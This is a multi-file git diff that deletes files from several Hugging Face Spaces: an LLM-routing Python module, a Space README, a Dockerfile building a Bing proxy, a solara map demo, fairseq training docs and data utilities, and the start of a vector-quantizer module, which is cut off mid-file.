LazyloadTiktoken(object): - def __init__(self, model): - self.model = model - - @staticmethod - @lru_cache(maxsize=128) - def get_encoder(model): - print('正在加载tokenizer,如果是第一次运行,可能需要一点时间下载参数') - tmp = tiktoken.encoding_for_model(model) - print('加载tokenizer完毕') - return tmp - - def encode(self, *args, **kwargs): - encoder = self.get_encoder(self.model) - return encoder.encode(*args, **kwargs) - - def decode(self, *args, **kwargs): - encoder = self.get_encoder(self.model) - return encoder.decode(*args, **kwargs) - -# Endpoint 重定向 -API_URL_REDIRECT, = get_conf("API_URL_REDIRECT") -openai_endpoint = "https://api.openai.com/v1/chat/completions" -api2d_endpoint = "https://openai.api2d.net/v1/chat/completions" -newbing_endpoint = "wss://sydney.bing.com/sydney/ChatHub" -# 兼容旧版的配置 -try: - API_URL, = get_conf("API_URL") - if API_URL != "https://api.openai.com/v1/chat/completions": - openai_endpoint = API_URL - print("警告!API_URL配置选项将被弃用,请更换为API_URL_REDIRECT配置") -except: - pass -# 新版配置 -if openai_endpoint in API_URL_REDIRECT: openai_endpoint = API_URL_REDIRECT[openai_endpoint] -if api2d_endpoint in API_URL_REDIRECT: api2d_endpoint = API_URL_REDIRECT[api2d_endpoint] -if newbing_endpoint in API_URL_REDIRECT: newbing_endpoint = API_URL_REDIRECT[newbing_endpoint] - - -# 获取tokenizer -tokenizer_gpt35 = LazyloadTiktoken("gpt-3.5-turbo") -tokenizer_gpt4 = LazyloadTiktoken("gpt-4") -get_token_num_gpt35 = lambda txt: len(tokenizer_gpt35.encode(txt, disallowed_special=())) -get_token_num_gpt4 = lambda txt: len(tokenizer_gpt4.encode(txt, disallowed_special=())) - - -model_info = { - # openai - "gpt-3.5-turbo": { - "fn_with_ui": chatgpt_ui, - "fn_without_ui": chatgpt_noui, - "endpoint": openai_endpoint, - "max_token": 4096, - "tokenizer": tokenizer_gpt35, - "token_cnt": get_token_num_gpt35, - }, - - "gpt-4": { - "fn_with_ui": chatgpt_ui, - "fn_without_ui": chatgpt_noui, - "endpoint": openai_endpoint, - "max_token": 8192, - "tokenizer": tokenizer_gpt4, - "token_cnt": get_token_num_gpt4, - }, - - # api_2d - "api2d-gpt-3.5-turbo": { - "fn_with_ui": chatgpt_ui, - "fn_without_ui": chatgpt_noui, - "endpoint": api2d_endpoint, - "max_token": 4096, - "tokenizer": tokenizer_gpt35, - "token_cnt": get_token_num_gpt35, - }, - - "api2d-gpt-4": { - "fn_with_ui": chatgpt_ui, - "fn_without_ui": chatgpt_noui, - "endpoint": api2d_endpoint, - "max_token": 8192, - "tokenizer": tokenizer_gpt4, - "token_cnt": get_token_num_gpt4, - }, - - # chatglm - "chatglm": { - "fn_with_ui": chatglm_ui, - "fn_without_ui": chatglm_noui, - "endpoint": None, - "max_token": 1024, - "tokenizer": tokenizer_gpt35, - "token_cnt": get_token_num_gpt35, - }, - # newbing - "newbing": { - "fn_with_ui": newbing_ui, - "fn_without_ui": newbing_noui, - "endpoint": newbing_endpoint, - "max_token": 4096, - "tokenizer": tokenizer_gpt35, - "token_cnt": get_token_num_gpt35, - }, -} - - -def LLM_CATCH_EXCEPTION(f): - """ - 装饰器函数,将错误显示出来 - """ - def decorated(inputs, llm_kwargs, history, sys_prompt, observe_window, console_slience): - try: - return f(inputs, llm_kwargs, history, sys_prompt, observe_window, console_slience) - except Exception as e: - tb_str = '\n```\n' + trimmed_format_exc() + '\n```\n' - observe_window[0] = tb_str - return tb_str - return decorated - - -def predict_no_ui_long_connection(inputs, llm_kwargs, history, sys_prompt, observe_window, console_slience=False): - """ - 发送至LLM,等待回复,一次性完成,不显示中间过程。但内部用stream的方法避免中途网线被掐。 - inputs: - 是本次问询的输入 - sys_prompt: - 系统静默prompt - llm_kwargs: - LLM的内部调优参数 - history: - 是之前的对话列表 - observe_window = None: - 用于负责跨越线程传递已经输出的部分,大部分时候仅仅为了fancy的视觉效果,留空即可。observe_window[0]:观测窗。observe_window[1]:看门狗 - """ - import threading, time, copy - - model = llm_kwargs['llm_model'] - n_model = 1 - if '&' not in model: - assert not model.startswith("tgui"), "TGUI不支持函数插件的实现" - - # 如果只询问1个大语言模型: - method = model_info[model]["fn_without_ui"] - return method(inputs, llm_kwargs, history, sys_prompt, observe_window, console_slience) - else: - # 如果同时询问多个大语言模型: - executor = ThreadPoolExecutor(max_workers=4) - models = model.split('&') - n_model = len(models) - - window_len = len(observe_window) - assert window_len==3 - window_mutex = [["", time.time(), ""] for _ in range(n_model)] + [True] - - futures = [] - for i in range(n_model): - model = models[i] - method = model_info[model]["fn_without_ui"] - llm_kwargs_feedin = copy.deepcopy(llm_kwargs) - llm_kwargs_feedin['llm_model'] = model - future = executor.submit(LLM_CATCH_EXCEPTION(method), inputs, llm_kwargs_feedin, history, sys_prompt, window_mutex[i], console_slience) - futures.append(future) - - def mutex_manager(window_mutex, observe_window): - while True: - time.sleep(0.25) - if not window_mutex[-1]: break - # 看门狗(watchdog) - for i in range(n_model): - window_mutex[i][1] = observe_window[1] - # 观察窗(window) - chat_string = [] - for i in range(n_model): - chat_string.append( f"【{str(models[i])} 说】: {window_mutex[i][0]} " ) - res = '

    \n\n---\n\n'.join(chat_string) - # # # # # # # # # # # - observe_window[0] = res - - t_model = threading.Thread(target=mutex_manager, args=(window_mutex, observe_window), daemon=True) - t_model.start() - - return_string_collect = [] - while True: - worker_done = [h.done() for h in futures] - if all(worker_done): - executor.shutdown() - break - time.sleep(1) - - for i, future in enumerate(futures): # wait and get - return_string_collect.append( f"【{str(models[i])} 说】: {future.result()} " ) - - window_mutex[-1] = False # stop mutex thread - res = '

    \n\n---\n\n'.join(return_string_collect) - return res - - -def predict(inputs, llm_kwargs, *args, **kwargs): - """ - 发送至LLM,流式获取输出。 - 用于基础的对话功能。 - inputs 是本次问询的输入 - top_p, temperature是LLM的内部调优参数 - history 是之前的对话列表(注意无论是inputs还是history,内容太长了都会触发token数量溢出的错误) - chatbot 为WebUI中显示的对话列表,修改它,然后yeild出去,可以直接修改对话界面内容 - additional_fn代表点击的哪个按钮,按钮见functional.py - """ - - method = model_info[llm_kwargs['llm_model']]["fn_with_ui"] - yield from method(inputs, llm_kwargs, *args, **kwargs) - diff --git a/spaces/gagan3012/streamlit-tags/README.md b/spaces/gagan3012/streamlit-tags/README.md deleted file mode 100644 index 5510a43e588f5948467bad493fc1b1c97ae25bfb..0000000000000000000000000000000000000000 --- a/spaces/gagan3012/streamlit-tags/README.md +++ /dev/null @@ -1,33 +0,0 @@ ---- -title: Streamlit Tags -emoji: 🐨 -colorFrom: pink -colorTo: pink -sdk: streamlit -app_file: app.py -pinned: false ---- - -# Configuration - -`title`: _string_ -Display title for the Space - -`emoji`: _string_ -Space emoji (emoji-only character allowed) - -`colorFrom`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`colorTo`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`sdk`: _string_ -Can be either `gradio` or `streamlit` - -`app_file`: _string_ -Path to your main application file (which contains either `gradio` or `streamlit` Python code). -Path is relative to the root of the repository. - -`pinned`: _boolean_ -Whether the Space stays on top of your list. diff --git a/spaces/galaxy001/biying/Dockerfile b/spaces/galaxy001/biying/Dockerfile deleted file mode 100644 index 3698c7cb7938e025afc53b18a571ae2961fbdffe..0000000000000000000000000000000000000000 --- a/spaces/galaxy001/biying/Dockerfile +++ /dev/null @@ -1,34 +0,0 @@ -# Build Stage -# 使用 golang:alpine 作为构建阶段的基础镜像 -FROM golang:alpine AS builder - -# 添加 git,以便之后能从GitHub克隆项目 -RUN apk --no-cache add git - -# 从 GitHub 克隆 go-proxy-bingai 项目到 /workspace/app 目录下 -RUN git clone https://github.com/Harry-zklcdc/go-proxy-bingai.git /workspace/app - -# 设置工作目录为之前克隆的项目目录 -WORKDIR /workspace/app - -# 编译 go 项目。-ldflags="-s -w" 是为了减少编译后的二进制大小 -RUN go build -ldflags="-s -w" -tags netgo -trimpath -o go-proxy-bingai main.go - -# Runtime Stage -# 使用轻量级的 alpine 镜像作为运行时的基础镜像 -FROM alpine - -# 设置工作目录 -WORKDIR /workspace/app - -# 从构建阶段复制编译后的二进制文件到运行时镜像中 -COPY --from=builder /workspace/app/go-proxy-bingai . - -# 设置环境变量,此处为随机字符 -ENV Go_Proxy_BingAI_USER_TOKEN_1="kJs8hD92ncMzLaoQWYtX5rG6bE3fZ4iO" - -# 暴露8080端口 -EXPOSE 8080 - -# 容器启动时运行的命令 -CMD ["/workspace/app/go-proxy-bingai"] \ No newline at end of file diff --git a/spaces/giswqs/solara-demo/pages/05_maplibre.py b/spaces/giswqs/solara-demo/pages/05_maplibre.py deleted file mode 100644 index 577229f3a5bca328993cc8cf980065c4e5e1ba68..0000000000000000000000000000000000000000 --- a/spaces/giswqs/solara-demo/pages/05_maplibre.py +++ /dev/null @@ -1,26 +0,0 @@ - -import mapwidget.maplibre as mapwidget - -import solara - -zoom = solara.reactive(2) -center = solara.reactive((20, 0)) - - -@solara.component -def Page(): - with solara.Column(style={"min-width": "500px", "height": "500px"}): - solara.Text("Not fully working yet. Try resizing the window to use the full width.") - - # solara components support reactive variables - solara.SliderInt(label="Zoom level", value=zoom, min=1, max=20) - # using 3rd party widget library require wiring up the events manually - # using zoom.value and zoom.set - mapwidget.Map.element( # type: ignore - zoom=zoom.value, - center=center.value, - height='600px', - width="100%" - ) - solara.Text(f"Zoom: {zoom.value}") - solara.Text(f"Center: {center.value}") diff --git a/spaces/gradio/HuBERT/examples/simultaneous_translation/docs/ende-mma.md b/spaces/gradio/HuBERT/examples/simultaneous_translation/docs/ende-mma.md deleted file mode 100644 index 241d604a3b31a37755da68aad6ff47d46891d3fc..0000000000000000000000000000000000000000 --- a/spaces/gradio/HuBERT/examples/simultaneous_translation/docs/ende-mma.md +++ /dev/null @@ -1,74 +0,0 @@ -# Simultaneous Machine Translation - -This directory contains the code for the paper [Monotonic Multihead Attention](https://openreview.net/forum?id=Hyg96gBKPS) - -## Prepare Data - -[Please follow the instructions to download and preprocess the WMT'15 En-De dataset.](https://github.com/pytorch/fairseq/tree/simulastsharedtask/examples/translation#prepare-wmt14en2desh) - -Another example of training an English to Japanese model can be found [here](docs/enja.md) - -## Training - -- MMA-IL - -```shell -fairseq-train \ - data-bin/wmt15_en_de_32k \ - --simul-type infinite_lookback \ - --user-dir $FAIRSEQ/example/simultaneous_translation \ - --mass-preservation \ - --criterion latency_augmented_label_smoothed_cross_entropy \ - --latency-weight-avg 0.1 \ - --max-update 50000 \ - --arch transformer_monotonic_iwslt_de_en save_dir_key=lambda \ - --optimizer adam --adam-betas '(0.9, 0.98)' \ - --lr-scheduler 'inverse_sqrt' \ - --warmup-init-lr 1e-7 --warmup-updates 4000 \ - --lr 5e-4 --stop-min-lr 1e-9 --clip-norm 0.0 --weight-decay 0.0001\ - --dropout 0.3 \ - --label-smoothing 0.1\ - --max-tokens 3584 -``` - -- MMA-H - -```shell -fairseq-train \ - data-bin/wmt15_en_de_32k \ - --simul-type hard_aligned \ - --user-dir $FAIRSEQ/example/simultaneous_translation \ - --mass-preservation \ - --criterion latency_augmented_label_smoothed_cross_entropy \ - --latency-weight-var 0.1 \ - --max-update 50000 \ - --arch transformer_monotonic_iwslt_de_en save_dir_key=lambda \ - --optimizer adam --adam-betas '(0.9, 0.98)' \ - --lr-scheduler 'inverse_sqrt' \ - --warmup-init-lr 1e-7 --warmup-updates 4000 \ - --lr 5e-4 --stop-min-lr 1e-9 --clip-norm 0.0 --weight-decay 0.0001\ - --dropout 0.3 \ - --label-smoothing 0.1\ - --max-tokens 3584 -``` - -- wait-k - -```shell -fairseq-train \ - data-bin/wmt15_en_de_32k \ - --simul-type wait-k \ - --waitk-lagging 3 \ - --user-dir $FAIRSEQ/example/simultaneous_translation \ - --mass-preservation \ - --criterion latency_augmented_label_smoothed_cross_entropy \ - --max-update 50000 \ - --arch transformer_monotonic_iwslt_de_en save_dir_key=lambda \ - --optimizer adam --adam-betas '(0.9, 0.98)' \ - --lr-scheduler 'inverse_sqrt' \ - --warmup-init-lr 1e-7 --warmup-updates 4000 \ - --lr 5e-4 --stop-min-lr 1e-9 --clip-norm 0.0 --weight-decay 0.0001\ - --dropout 0.3 \ - --label-smoothing 0.1\ - --max-tokens 3584 -``` diff --git a/spaces/gradio/HuBERT/fairseq/data/data_utils.py b/spaces/gradio/HuBERT/fairseq/data/data_utils.py deleted file mode 100644 index b3de57681e0fb6b026003eff19f7745caf6799d3..0000000000000000000000000000000000000000 --- a/spaces/gradio/HuBERT/fairseq/data/data_utils.py +++ /dev/null @@ -1,595 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -try: - from collections.abc import Iterable -except ImportError: - from collections import Iterable -import contextlib -import itertools -import logging -import re -import warnings -from typing import Optional, Tuple - -import numpy as np -import torch - -from fairseq.file_io import PathManager -from fairseq import utils -import os - -logger = logging.getLogger(__name__) - - -def infer_language_pair(path): - """Infer language pair from filename: .-.(...).idx""" - src, dst = None, None - for filename in PathManager.ls(path): - parts = filename.split(".") - if len(parts) >= 3 and len(parts[1].split("-")) == 2: - return parts[1].split("-") - return src, dst - - -def collate_tokens( - values, - pad_idx, - eos_idx=None, - left_pad=False, - move_eos_to_beginning=False, - pad_to_length=None, - pad_to_multiple=1, - pad_to_bsz=None, -): - """Convert a list of 1d tensors into a padded 2d tensor.""" - size = max(v.size(0) for v in values) - size = size if pad_to_length is None else max(size, pad_to_length) - if pad_to_multiple != 1 and size % pad_to_multiple != 0: - size = int(((size - 0.1) // pad_to_multiple + 1) * pad_to_multiple) - - batch_size = len(values) if pad_to_bsz is None else max(len(values), pad_to_bsz) - res = values[0].new(batch_size, size).fill_(pad_idx) - - def copy_tensor(src, dst): - assert dst.numel() == src.numel() - if move_eos_to_beginning: - if eos_idx is None: - # if no eos_idx is specified, then use the last token in src - dst[0] = src[-1] - else: - dst[0] = eos_idx - dst[1:] = src[:-1] - else: - dst.copy_(src) - - for i, v in enumerate(values): - copy_tensor(v, res[i][size - len(v) :] if left_pad else res[i][: len(v)]) - return res - -def load_indexed_dataset( - path, dictionary=None, dataset_impl=None, combine=False, default="cached" -): - """A helper function for loading indexed datasets. - - Args: - path (str): path to indexed dataset (e.g., 'data-bin/train') - dictionary (~fairseq.data.Dictionary): data dictionary - dataset_impl (str, optional): which dataset implementation to use. If - not provided, it will be inferred automatically. For legacy indexed - data we use the 'cached' implementation by default. - combine (bool, optional): automatically load and combine multiple - datasets. For example, if *path* is 'data-bin/train', then we will - combine 'data-bin/train', 'data-bin/train1', ... and return a - single ConcatDataset instance. - """ - import fairseq.data.indexed_dataset as indexed_dataset - from fairseq.data.concat_dataset import ConcatDataset - - datasets = [] - for k in itertools.count(): - path_k = path + (str(k) if k > 0 else "") - try: - path_k = indexed_dataset.get_indexed_dataset_to_local(path_k) - except Exception as e: - if "StorageException: [404] Path not found" in str(e): - logger.warning(f"path_k: {e} not found") - else: - raise e - - dataset_impl_k = dataset_impl - if dataset_impl_k is None: - dataset_impl_k = indexed_dataset.infer_dataset_impl(path_k) - dataset = indexed_dataset.make_dataset( - path_k, - impl=dataset_impl_k or default, - fix_lua_indexing=True, - dictionary=dictionary, - ) - if dataset is None: - break - logger.info("loaded {:,} examples from: {}".format(len(dataset), path_k)) - datasets.append(dataset) - if not combine: - break - if len(datasets) == 0: - return None - elif len(datasets) == 1: - return datasets[0] - else: - return ConcatDataset(datasets) - - -@contextlib.contextmanager -def numpy_seed(seed, *addl_seeds): - """Context manager which seeds the NumPy PRNG with the specified seed and - restores the state afterward""" - if seed is None: - yield - return - if len(addl_seeds) > 0: - seed = int(hash((seed, *addl_seeds)) % 1e6) - state = np.random.get_state() - np.random.seed(seed) - try: - yield - finally: - np.random.set_state(state) - - -def collect_filtered(function, iterable, filtered): - """ - Similar to :func:`filter` but collects filtered elements in ``filtered``. - - Args: - function (callable): function that returns ``False`` for elements that - should be filtered - iterable (iterable): iterable to filter - filtered (list): list to store filtered elements - """ - for el in iterable: - if function(el): - yield el - else: - filtered.append(el) - - -def _filter_by_size_dynamic(indices, size_fn, max_positions, raise_exception=False): - def compare_leq(a, b): - return a <= b if not isinstance(a, tuple) else max(a) <= b - - def check_size(idx): - if isinstance(max_positions, float) or isinstance(max_positions, int): - return size_fn(idx) <= max_positions - elif isinstance(max_positions, dict): - idx_size = size_fn(idx) - assert isinstance(idx_size, dict) - intersect_keys = set(max_positions.keys()) & set(idx_size.keys()) - return all( - all( - a is None or b is None or a <= b - for a, b in zip(idx_size[key], max_positions[key]) - ) - for key in intersect_keys - ) - else: - # For MultiCorpusSampledDataset, will generalize it later - if not isinstance(size_fn(idx), Iterable): - return all(size_fn(idx) <= b for b in max_positions) - return all( - a is None or b is None or a <= b - for a, b in zip(size_fn(idx), max_positions) - ) - - ignored = [] - itr = collect_filtered(check_size, indices, ignored) - indices = np.fromiter(itr, dtype=np.int64, count=-1) - return indices, ignored - - -def filter_by_size(indices, dataset, max_positions, raise_exception=False): - """ - [deprecated] Filter indices based on their size. - Use `FairseqDataset::filter_indices_by_size` instead. - - Args: - indices (List[int]): ordered list of dataset indices - dataset (FairseqDataset): fairseq dataset instance - max_positions (tuple): filter elements larger than this size. - Comparisons are done component-wise. - raise_exception (bool, optional): if ``True``, raise an exception if - any elements are filtered (default: False). - """ - warnings.warn( - "data_utils.filter_by_size is deprecated. " - "Use `FairseqDataset::filter_indices_by_size` instead.", - stacklevel=2, - ) - if isinstance(max_positions, float) or isinstance(max_positions, int): - if hasattr(dataset, "sizes") and isinstance(dataset.sizes, np.ndarray): - ignored = indices[dataset.sizes[indices] > max_positions].tolist() - indices = indices[dataset.sizes[indices] <= max_positions] - elif ( - hasattr(dataset, "sizes") - and isinstance(dataset.sizes, list) - and len(dataset.sizes) == 1 - ): - ignored = indices[dataset.sizes[0][indices] > max_positions].tolist() - indices = indices[dataset.sizes[0][indices] <= max_positions] - else: - indices, ignored = _filter_by_size_dynamic( - indices, dataset.size, max_positions - ) - else: - indices, ignored = _filter_by_size_dynamic(indices, dataset.size, max_positions) - - if len(ignored) > 0 and raise_exception: - raise Exception( - ( - "Size of sample #{} is invalid (={}) since max_positions={}, " - "skip this example with --skip-invalid-size-inputs-valid-test" - ).format(ignored[0], dataset.size(ignored[0]), max_positions) - ) - if len(ignored) > 0: - logger.warning( - ( - "{} samples have invalid sizes and will be skipped, " - "max_positions={}, first few sample ids={}" - ).format(len(ignored), max_positions, ignored[:10]) - ) - return indices - - -def filter_paired_dataset_indices_by_size(src_sizes, tgt_sizes, indices, max_sizes): - """Filter a list of sample indices. Remove those that are longer - than specified in max_sizes. - - Args: - indices (np.array): original array of sample indices - max_sizes (int or list[int] or tuple[int]): max sample size, - can be defined separately for src and tgt (then list or tuple) - - Returns: - np.array: filtered sample array - list: list of removed indices - """ - if max_sizes is None: - return indices, [] - if type(max_sizes) in (int, float): - max_src_size, max_tgt_size = max_sizes, max_sizes - else: - max_src_size, max_tgt_size = max_sizes - if tgt_sizes is None: - ignored = indices[src_sizes[indices] > max_src_size] - else: - ignored = indices[ - (src_sizes[indices] > max_src_size) | (tgt_sizes[indices] > max_tgt_size) - ] - if len(ignored) > 0: - if tgt_sizes is None: - indices = indices[src_sizes[indices] <= max_src_size] - else: - indices = indices[ - (src_sizes[indices] <= max_src_size) - & (tgt_sizes[indices] <= max_tgt_size) - ] - return indices, ignored.tolist() - - -def batch_by_size( - indices, - num_tokens_fn, - num_tokens_vec=None, - max_tokens=None, - max_sentences=None, - required_batch_size_multiple=1, - fixed_shapes=None, -): - """ - Yield mini-batches of indices bucketed by size. Batches may contain - sequences of different lengths. - - Args: - indices (List[int]): ordered list of dataset indices - num_tokens_fn (callable): function that returns the number of tokens at - a given index - num_tokens_vec (List[int], optional): precomputed vector of the number - of tokens for each index in indices (to enable faster batch generation) - max_tokens (int, optional): max number of tokens in each batch - (default: None). - max_sentences (int, optional): max number of sentences in each - batch (default: None). - required_batch_size_multiple (int, optional): require batch size to - be less than N or a multiple of N (default: 1). - fixed_shapes (List[Tuple[int, int]], optional): if given, batches will - only be created with the given shapes. *max_sentences* and - *required_batch_size_multiple* will be ignored (default: None). - """ - try: - from fairseq.data.data_utils_fast import ( - batch_by_size_fn, - batch_by_size_vec, - batch_fixed_shapes_fast, - ) - except ImportError: - raise ImportError( - "Please build Cython components with: " - "`python setup.py build_ext --inplace`" - ) - except ValueError: - raise ValueError( - "Please build (or rebuild) Cython components with `python setup.py build_ext --inplace`." - ) - - # added int() to avoid TypeError: an integer is required - max_tokens = ( - int(max_tokens) if max_tokens is not None else -1 - ) - max_sentences = max_sentences if max_sentences is not None else -1 - bsz_mult = required_batch_size_multiple - - if not isinstance(indices, np.ndarray): - indices = np.fromiter(indices, dtype=np.int64, count=-1) - - if num_tokens_vec is not None and not isinstance(num_tokens_vec, np.ndarray): - num_tokens_vec = np.fromiter(num_tokens_vec, dtype=np.int64, count=-1) - - if fixed_shapes is None: - if num_tokens_vec is None: - return batch_by_size_fn( - indices, - num_tokens_fn, - max_tokens, - max_sentences, - bsz_mult, - ) - else: - return batch_by_size_vec( - indices, - num_tokens_vec, - max_tokens, - max_sentences, - bsz_mult, - ) - - else: - fixed_shapes = np.array(fixed_shapes, dtype=np.int64) - sort_order = np.lexsort( - [ - fixed_shapes[:, 1].argsort(), # length - fixed_shapes[:, 0].argsort(), # bsz - ] - ) - fixed_shapes_sorted = fixed_shapes[sort_order] - return batch_fixed_shapes_fast(indices, num_tokens_fn, fixed_shapes_sorted) - - -def post_process(sentence: str, symbol: str): - if symbol == "sentencepiece": - sentence = sentence.replace(" ", "").replace("\u2581", " ").strip() - elif symbol == "wordpiece": - sentence = sentence.replace(" ", "").replace("_", " ").strip() - elif symbol == "letter": - sentence = sentence.replace(" ", "").replace("|", " ").strip() - elif symbol == "silence": - import re - sentence = sentence.replace("", "") - sentence = re.sub(' +', ' ', sentence).strip() - elif symbol == "_EOW": - sentence = sentence.replace(" ", "").replace("_EOW", " ").strip() - elif symbol in {"subword_nmt", "@@ ", "@@"}: - if symbol == "subword_nmt": - symbol = "@@ " - sentence = (sentence + " ").replace(symbol, "").rstrip() - elif symbol == "none": - pass - elif symbol is not None: - raise NotImplementedError(f"Unknown post_process option: {symbol}") - return sentence - - -def compute_mask_indices( - shape: Tuple[int, int], - padding_mask: Optional[torch.Tensor], - mask_prob: float, - mask_length: int, - mask_type: str = "static", - mask_other: float = 0.0, - min_masks: int = 0, - no_overlap: bool = False, - min_space: int = 0, -) -> np.ndarray: - """ - Computes random mask spans for a given shape - - Args: - shape: the the shape for which to compute masks. - should be of size 2 where first element is batch size and 2nd is timesteps - padding_mask: optional padding mask of the same size as shape, which will prevent masking padded elements - mask_prob: probability for each token to be chosen as start of the span to be masked. this will be multiplied by - number of timesteps divided by length of mask span to mask approximately this percentage of all elements. - however due to overlaps, the actual number will be smaller (unless no_overlap is True) - mask_type: how to compute mask lengths - static = fixed size - uniform = sample from uniform distribution [mask_other, mask_length*2] - normal = sample from normal distribution with mean mask_length and stdev mask_other. mask is min 1 element - poisson = sample from possion distribution with lambda = mask length - min_masks: minimum number of masked spans - no_overlap: if false, will switch to an alternative recursive algorithm that prevents spans from overlapping - min_space: only used if no_overlap is True, this is how many elements to keep unmasked between spans - """ - - bsz, all_sz = shape - mask = np.full((bsz, all_sz), False) - - all_num_mask = int( - # add a random number for probabilistic rounding - mask_prob * all_sz / float(mask_length) - + np.random.rand() - ) - - all_num_mask = max(min_masks, all_num_mask) - - mask_idcs = [] - for i in range(bsz): - if padding_mask is not None: - sz = all_sz - padding_mask[i].long().sum().item() - num_mask = int( - # add a random number for probabilistic rounding - mask_prob * sz / float(mask_length) - + np.random.rand() - ) - num_mask = max(min_masks, num_mask) - else: - sz = all_sz - num_mask = all_num_mask - - if mask_type == "static": - lengths = np.full(num_mask, mask_length) - elif mask_type == "uniform": - lengths = np.random.randint(mask_other, mask_length * 2 + 1, size=num_mask) - elif mask_type == "normal": - lengths = np.random.normal(mask_length, mask_other, size=num_mask) - lengths = [max(1, int(round(x))) for x in lengths] - elif mask_type == "poisson": - lengths = np.random.poisson(mask_length, size=num_mask) - lengths = [int(round(x)) for x in lengths] - else: - raise Exception("unknown mask selection " + mask_type) - - if sum(lengths) == 0: - lengths[0] = min(mask_length, sz - 1) - - if no_overlap: - mask_idc = [] - - def arrange(s, e, length, keep_length): - span_start = np.random.randint(s, e - length) - mask_idc.extend(span_start + i for i in range(length)) - - new_parts = [] - if span_start - s - min_space >= keep_length: - new_parts.append((s, span_start - min_space + 1)) - if e - span_start - keep_length - min_space > keep_length: - new_parts.append((span_start + length + min_space, e)) - return new_parts - - parts = [(0, sz)] - min_length = min(lengths) - for length in sorted(lengths, reverse=True): - lens = np.fromiter( - (e - s if e - s >= length + min_space else 0 for s, e in parts), - np.int, - ) - l_sum = np.sum(lens) - if l_sum == 0: - break - probs = lens / np.sum(lens) - c = np.random.choice(len(parts), p=probs) - s, e = parts.pop(c) - parts.extend(arrange(s, e, length, min_length)) - mask_idc = np.asarray(mask_idc) - else: - min_len = min(lengths) - if sz - min_len <= num_mask: - min_len = sz - num_mask - 1 - - mask_idc = np.random.choice(sz - min_len, num_mask, replace=False) - - mask_idc = np.asarray( - [ - mask_idc[j] + offset - for j in range(len(mask_idc)) - for offset in range(lengths[j]) - ] - ) - - mask_idcs.append(np.unique(mask_idc[mask_idc < sz])) - - min_len = min([len(m) for m in mask_idcs]) - for i, mask_idc in enumerate(mask_idcs): - if len(mask_idc) > min_len: - mask_idc = np.random.choice(mask_idc, min_len, replace=False) - mask[i, mask_idc] = True - - return mask - - -def get_mem_usage(): - try: - import psutil - - mb = 1024 * 1024 - return f"used={psutil.virtual_memory().used / mb}Mb; avail={psutil.virtual_memory().available / mb}Mb" - except ImportError: - return "N/A" - - -# lens: torch.LongTensor -# returns: torch.BoolTensor -def lengths_to_padding_mask(lens): - bsz, max_lens = lens.size(0), torch.max(lens).item() - mask = torch.arange(max_lens).to(lens.device).view(1, max_lens) - mask = mask.expand(bsz, -1) >= lens.view(bsz, 1).expand(-1, max_lens) - return mask - - -# lens: torch.LongTensor -# returns: torch.BoolTensor -def lengths_to_mask(lens): - return ~lengths_to_padding_mask(lens) - - -def get_buckets(sizes, num_buckets): - buckets = np.unique( - np.percentile( - sizes, - np.linspace(0, 100, num_buckets + 1), - interpolation='lower', - )[1:] - ) - return buckets - - -def get_bucketed_sizes(orig_sizes, buckets): - sizes = np.copy(orig_sizes) - assert np.min(sizes) >= 0 - start_val = -1 - for end_val in buckets: - mask = (sizes > start_val) & (sizes <= end_val) - sizes[mask] = end_val - start_val = end_val - return sizes - - - -def _find_extra_valid_paths(dataset_path: str) -> set: - paths = utils.split_paths(dataset_path) - all_valid_paths = set() - for sub_dir in paths: - contents = PathManager.ls(sub_dir) - valid_paths = [c for c in contents if re.match("valid*[0-9].*", c) is not None] - all_valid_paths |= {os.path.basename(p) for p in valid_paths} - # Remove .bin, .idx etc - roots = {os.path.splitext(p)[0] for p in all_valid_paths} - return roots - - -def raise_if_valid_subsets_unintentionally_ignored(train_cfg) -> None: - """Raises if there are paths matching 'valid*[0-9].*' which are not combined or ignored.""" - if ( - train_cfg.dataset.ignore_unused_valid_subsets - or train_cfg.dataset.combine_valid_subsets - or train_cfg.dataset.disable_validation - or not hasattr(train_cfg.task, "data") - ): - return - other_paths = _find_extra_valid_paths(train_cfg.task.data) - specified_subsets = train_cfg.dataset.valid_subset.split(",") - ignored_paths = [p for p in other_paths if p not in specified_subsets] - if ignored_paths: - advice = "Set --combine-val to combine them or --ignore-unused-valid-subsets to ignore them." - msg = f"Valid paths {ignored_paths} will be ignored. {advice}" - raise ValueError(msg) diff --git a/spaces/gradio/HuBERT/fairseq/modules/gumbel_vector_quantizer.py b/spaces/gradio/HuBERT/fairseq/modules/gumbel_vector_quantizer.py deleted file mode 100644 index 71134388889d7f224655957256e78fd6c02d72a3..0000000000000000000000000000000000000000 --- a/spaces/gradio/HuBERT/fairseq/modules/gumbel_vector_quantizer.py +++ /dev/null @@ -1,202 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import torch -import torch.nn as nn -import torch.nn.functional as F - - -class GumbelVectorQuantizer(nn.Module): - def __init__( - self, - dim, - num_vars, - temp, - groups, - combine_groups, - vq_dim, - time_first, - activation=nn.GELU(), - weight_proj_depth=1, - weight_proj_factor=1, - ): - """Vector quantization using gumbel softmax - - Args: - dim: input dimension (channels) - num_vars: number of quantized vectors per group - temp: temperature for training. this should be a tuple of 3 elements: (start, stop, decay factor) - groups: number of groups for vector quantization - combine_groups: whether to use the vectors for all groups - vq_dim: dimensionality of the resulting quantized vector - time_first: if true, expect input in BxTxC format, otherwise in BxCxT - activation: what activation to use (should be a module). this is only used if weight_proj_depth is > 1 - weight_proj_depth: number of layers (with activation in between) to project input before computing logits - weight_proj_factor: this is used only if weight_proj_depth is > 1. scales the inner dimensionality of - projections by this factor - """ - super().__init__() - - self.groups = groups - self.combine_groups = combine_groups - self.input_dim = dim - self.num_vars = num_vars - self.time_first = time_first - - assert ( - vq_dim % groups == 0 - ), f"dim {vq_dim} must be divisible by groups {groups} for concatenation" - - var_dim = vq_dim // groups - num_groups = groups if not combine_groups else 1 - - self.vars = nn.Parameter(torch.FloatTensor(1, num_groups * num_vars, var_dim)) - nn.init.uniform_(self.vars) - - if weight_proj_depth > 1: - - def block(input_dim, output_dim): - return nn.Sequential(nn.Linear(input_dim, output_dim), activation) - - inner_dim = self.input_dim * weight_proj_factor - self.weight_proj = nn.Sequential( - *[ - 